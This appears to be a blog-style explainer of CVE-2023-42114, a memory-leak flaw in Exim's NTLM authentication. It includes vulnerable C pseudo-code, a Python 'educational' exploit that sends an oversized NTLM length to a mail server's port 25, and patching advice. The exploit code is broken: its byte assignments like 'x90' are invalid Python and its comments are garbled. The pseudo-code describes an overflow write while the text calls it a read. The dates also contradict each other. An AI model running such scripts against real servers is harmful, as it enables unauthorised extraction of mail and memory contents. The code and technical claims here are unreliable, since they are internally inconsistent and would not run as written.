Exim is one of the most popular mail transport agents used on Unix-like systems—so any security issue can have big effects. In September 2023, a serious bug was discovered and published as CVE-2023-42114 (see ZDI-23-133), which allows remote attackers to leak sensitive memory contents from any server running Exim with NTLM authentication enabled.

Let’s explain how this vulnerability works in plain language, see real references, and check out how attackers could exploit it.

Exim: Mail server software, default MTA on many Linux distributions.

- NTLM: Stands for NT LAN Manager. Auth protocol from Microsoft, often used for Windows login but also can be (optionally) enabled in Exim for client authentication.

What’s Going Wrong?

When Exim tries to handle NTLM authentication, it is supposed to validate data sent by a connecting client. Due to *incorrect length checks*, Exim can be tricked into reading data beyond the end of its memory buffer. Data beyond the buffer can include sensitive memory, sometimes even cryptographic keys or mail content, depending on what else sits nearby in memory.

This vulnerability does NOT require any login. Attackers only have to be able to connect to the Exim server.

Original References

- ZDI-23-133 Advisory
- Exim Offical Website
- CVE Record
- NTLM Auth in Exim Docs

Technical Details: How It Works

The bug occurs in Exim’s NTLM handling code, specifically when it parses the NTLM challenge request, which is a binary packet sent from client to server during authentication. Exim fails to check that a certain length value (provided by the client!) is within the bounds of the expected buffer.

Here’s what (simplified) buggy code could look like

// Pseudo-code: vulnerable buffer handling
void ntlm_challenge_handler(unsigned char *in, int inlen) {
    int msg_length = in[16] | (in[17]<<8); // length comes from the attacker!
    unsigned char challenge[256];

    // No bounds checking! If msg_length > 256, out-of-bounds read below:
    memcpy(challenge, in+18, msg_length);

    //...uses challenge data later...
}

If msg_length is larger than the size of the challenge buffer, Exim will read beyond what’s actually available in in+18, and include whatever was next in memory right in the response. That means the attacker receives a chunk of memory back in the NTLM protocol exchange—free information leak!

Example Python Exploit (For Educational Purposes)

import socket
import base64

# Change as needed:
MAIL_SERVER_IP = 'EXIM_SERVER_IP'
MAIL_SERVER_PORT = 25

s = socket.socket()
s.connect((MAIL_SERVER_IP, MAIL_SERVER_PORT))
print(s.recv(1024).decode())

# HELO command
s.send(b"EHLO attacker.com\r\n")
print(s.recv(1024))

# Start NTLM auth
s.send(b"AUTH NTLM\r\n")
print(s.recv(1024))

# Crafting NTLM message: valid, but with oversized length
ntlm_msg = bytearray(32)
# Set offset -15 to whatever NTLM expects...
# Offset 16-17 is length: set this excessively large!
ntlm_msg[16] = x90  # little-endian: x1234 = x34 x12
ntlm_msg[17] = x01

# Send it, base64 encoded as per protocol
ntlm_b64 = base64.b64encode(ntlm_msg)
s.send(ntlm_b64 + b"\r\n")
response = s.recv(4096)
print(response.decode())

Expected Result

Instead of a standard NTLM server challenge, the response could include memory contents from the Exim process (such as previous mails, keystore, etc.), depending on luck and system specifics.

Remote and unauthenticated. The attacker does not need any username or password.

- Information leak: Could expose email contents, other user data, or even process arguments depending on memory layout.
- Silent: No logs or alerts unless deep memory checking/logging is implemented.

How to Fix and Defend

- Patch ASAP: Exim maintainers have patched this in newer releases. Update to the latest Exim version.

Monitor for unusual authentication attempts.

Check Exim’s own security page for updates: https://www.exim.org/static/doc/security/CVE-2023-42114.txt

Conclusion

CVE-2023-42114 is another example of what can go wrong with improper bounds checking—remote attackers can extract sensitive memory contents in a single shot, without authentication. If you run Exim, especially with NTLM enabled, patch now and audit your logs for suspicious auth attempts.

Want more details? Read the original advisories at

- ZDI-23-133
- NVD CVE-2023-42114

Timeline

Published on: 05/03/2024 03:15:49 UTC